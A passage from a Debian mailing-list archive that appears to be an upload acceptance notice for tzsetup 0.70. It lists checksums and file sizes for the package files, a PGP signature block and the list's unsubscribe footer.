195444000f76152b60be188b8973b8c40fa52208636907eed09f4464635e5cfc 76494 tzsetup-udeb_0.70_all.udeb Files: b277ce2a145862410e759ba981687d1e 1658 debian-installer optional tzsetup_0.70.dsc 433f9a978de58c821e92415d1d9ffd02 108480 debian-installer optional tzsetup_0.70.tar.xz b75fd78065cdf4b38c3c886aa4b3ef21 76494 debian-installer optional tzsetup-udeb_0.70_all.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVfRi5AAoJEIcvcCxNbiWod/UP/2Nq1plHVhSrkSteDXD1wxI+ hEITq7pQ/9AYYCwOYtga0zC9orb3TiiEq+iIfmHScM87SRSBDg8f+Unai/HVSfdB o7vsRQkncIWTMRMSHOWVaR46dsaEq1fFcOArNBhT5GLV6KaCvj501CuaIKmolo4+ xsmAeGY5Xyrbng+vXMUyrarD2WlYhfpdkkZj8goMN/XFBJ5cJpzs69TbZ6dto3xR NqqkKouASUr1cXCcVqnbqycdD5xUUj0P8zoVSdDAHOi4bqjYvvAebqu3zDukfu6t ceSZexpO721m07bdk/ppidcCrAHY8GpOp3EWzSwB4aR7NQqfh1wtnW494dkQExxh EfsW0wMjMOLiZFbMs0t/dZwOYv/kZNRxHYDoxskHpWi2ek46YLpkh7I06AcCd5id 14YKF9C5ASGjfGspI1HyVUFU0QNJswunHiFLNfr82unt6ILHCHOhtKRkEKw9SbAP W56vbUuAo4ucgkpim7XRIqNeoDDl40y4cR+7KmXo4DVnUQyADE+EOOku1EctlgF0 ZnB3vOl0CppeFnq43ozUaavsN7rFAKe17ocF+srmV7SLZpS3hIfIiiJC3BUfFZ+N 6QOrdOjgOJhJl+mjPNPdm02GbI3ve0SBvOtUtKV3/ngtRTmSnIPOZ5pvq+QiC/iY uULOmxtddxs//6gDBJDj =28iA -END PGP SIGNATURE- Thank you for your contribution to Debian. -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z41gu-0001bj...@franck.debian.org